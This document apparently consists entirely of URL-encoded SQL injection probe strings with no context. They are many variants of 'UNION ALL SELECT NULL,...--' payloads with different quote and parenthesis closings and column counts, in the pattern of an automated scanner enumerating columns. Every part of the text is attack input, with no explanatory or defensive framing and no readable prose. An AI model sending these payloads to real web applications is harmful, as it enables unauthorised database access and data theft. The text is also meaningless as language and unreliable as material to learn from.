1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%22epIt%22%3D%22epIt 1%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%22QOOX%22%20LIKE%20%22QOOX 1%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%22NTdt%22%20LIKE%20%22NTdt 1%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%22TsAi%22%20LIKE%20%22TsAi 1%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%22LWEO%22%20LIKE%20%22LWEO 1%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%22maBL%22%20LIKE%20%22maBL 1%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%22YCOo%22%20LIKE%20%22YCOo 1%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%22JEso%22%20LIKE%20%22JEso 1%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%22pmoU%22%20LIKE%20%22pmoU 1%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%22cpuB%22%20LIKE%20%22cpuB 1%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%22raOC%22%20LIKE%20%22raOC 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%22boWW%22%20LIKE%20%22boWW 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%22RpKG%22%20LIKE%20%22RpKG 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%22pzez%22%20LIKE%20%22pzez 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%22GDZh%22%20LIKE%20%22GDZh 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%22nuXd%22%20LIKE%20%22nuXd 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%22BvXb%22%20LIKE%20%22BvXb 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%22UNsU%22%20LIKE%20%22UNsU 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%22Adar%22%20LIKE%20%22Adar 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%22vEhZ%22%20LIKE%20%22vEhZ 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%22FsHV%22%20LIKE%20%22FsHV 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%22pyoP%22%20LIKE%20%22pyoP 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%22CBrS%22%20LIKE%20%22CBrS 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%22XQSt%22%20LIKE%20%22XQSt 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%22DEqP%22%20LIKE%20%22DEqP 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%22HVVs%22%20LIKE%20%22HVVs 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%22ixvY%22%20LIKE%20%22ixvY 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%22Tket%22%20LIKE%20%22Tket 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%22roNl%22%20LIKE%20%22roNl 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%22UoQq%22%20LIKE%20%22UoQq 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%22PUJe%22%20LIKE%20%22PUJe 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%22BQoV%22%20LIKE%20%22BQoV 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%22Vnyp%22%20LIKE%20%22Vnyp 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%22fvDy%22%20LIKE%20%22fvDy 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%22piTT%22%20LIKE%20%22piTT 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%22mwlp%22%20LIKE%20%22mwlp 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%22zITE%22%20LIKE%20%22zITE 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%22Yfrn%22%20LIKE%20%22Yfrn 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%22lllo%22%20LIKE%20%22lllo 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%22AOSX%22%20LIKE%20%22AOSX 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%22NRES%22%20LIKE%20%22NRES 1%29%20WHERE%203709%3D3709%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%29%20WHERE%208160%3D8160%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%29%20WHERE%202845%3D2845%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 